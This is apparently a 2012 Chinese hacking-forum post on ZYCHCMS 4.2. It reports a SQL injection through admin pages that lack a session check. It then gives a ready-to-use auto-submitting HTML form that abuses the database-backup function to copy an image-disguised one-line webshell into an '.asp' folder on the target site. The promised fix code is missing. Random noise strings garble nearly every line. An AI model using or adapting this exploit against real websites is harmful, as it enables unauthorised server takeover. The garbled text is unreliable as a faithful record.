中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
( s9 M! d$ A) D5 N
% T( E' ]2 I5 h; _: {
- T$ l6 e& j( N5 }5 a/ N, ^$ g- S9 X

* |( ~  I# N( i影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
' f6 `0 `) `- s4 `6 Q: U ①SQL注射漏洞
" A. ?+ z/ v) l' b% ? 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp( d. v0 z& L( q8 L& u6 G
漏洞原因:未过滤! ~# j* b% o$ b4 _
漏洞代码:0 t' H, W8 f. [: m. ^: g7 w. ?/ p
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。' M: \4 ?$ U2 z* [
修复方法:在文件开头加入代码
2 I5 n2 }; p* c+ @7 n5 K " B0 h" r1 N! v
! }1 w# A4 T% n- }: ^. q2 Z# }
②后台拿WBSHELL
  C2 T5 q" m* m 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
2 [7 }9 j: g# K) l- I: Q' E 这里在网上找了一个,改了下,将就着用。, }$ [- X+ s4 X: g2 q
以下是代码本地提交代码2 }, `9 ~) v" e
* v3 T6 c6 P1 n: S) e* `9 a! W
0 k7 w- {5 ~& q! B: Q; M
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
' ~! j' U. g2 ]- G <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>- a) j# I0 P0 n% o
<tr>
5 g2 N) U: o' O( J <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
% `1 l+ l. m! ]" ~' b9 W </tr>+ q9 r7 d% O* B2 S7 J7 A
<tr>. a- z) u) M6 l% h# V
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
& S9 ?' c7 P" W+ {* p5 ?0 U </span>
4 Q5 O" L0 Z0 O- @. U <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
4 c# n( Y/ z  r- D. i% @ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
+ |1 E; M6 `- j! R6 \ <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
) S5 F# r6 x( t6 D, c <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
. ]6 N: [9 c" k' [1 C! W <div align=”left”>8 D# o$ U4 x9 ^) x
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
, a1 u( D; ~- h7 Q+ |( [' g <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
. R# m" B9 L( d. s <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />  \9 X) `# R$ Q8 e( S& ^
</div></td>( M4 l5 k6 A, m# L* k
</tr>  x! u4 ]7 K9 K/ f+ d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
6 ~" Z0 Y8 D( k <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
2 @7 m3 K! W% [ <td class=”td”><div align=”left”>$ |4 D& {3 t, ~7 ^+ ?' }
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
" Q7 ^# X& K# O6 `9 {: p [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>( }" b. C- b. E4 l1 ^
</tr>
# s$ m+ {+ P1 z2 p. h9 o) n4 u <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
/ a' i* r- z( s9 i- m/ k- A <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
6 t. d9 F2 X9 s" Y+ d& x <td class=”td”><div align=”left”>' S; ], o, L$ Q% i$ Y! V* {
<input type=”submit” value=”确定备份” class=”btn”
( h* e2 {) T2 l/ L5 |: d7 d' r6 g2 U </div></td>* N  E) L/ A2 X
</tr>- v# P: y# d  C4 m
</table></td></tr></form>
4 N" {$ |# Y6 E- s </table>% Q2 D& _( S, \3 O  M
</td>
2 L6 o* V8 x5 k </tr>
4 V! X3 p+ k. c; E- K+ p </table>
9 \1 @2 w- w. d/ v' Z <script>
9 D$ y- ^2 l: g: v" X document.all.add.submit();
& o' \" y9 F, |) A </script>: C# f. }. e2 |. N  v' a

+ C: g4 R$ U- L+ d3 m4 m: b
& O- k6 F" h! E2 k# C. H$ [. \2 }* w  {

; K0 g# a# K5 m+ o( m0 s- n* z# L
3 z" W7 D# K  [1 D; ~: D& W
) N8 U' @: k; V! w4 c7 g9 z
* a2 K/ a& ^& p, _* v; c. }: B( j% b" U" V* j" `8 r4 u
$ o. A, u4 F8 g1 Y2 Z3 s3 D  W

$ f( x* G" s0 R! |. ?




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2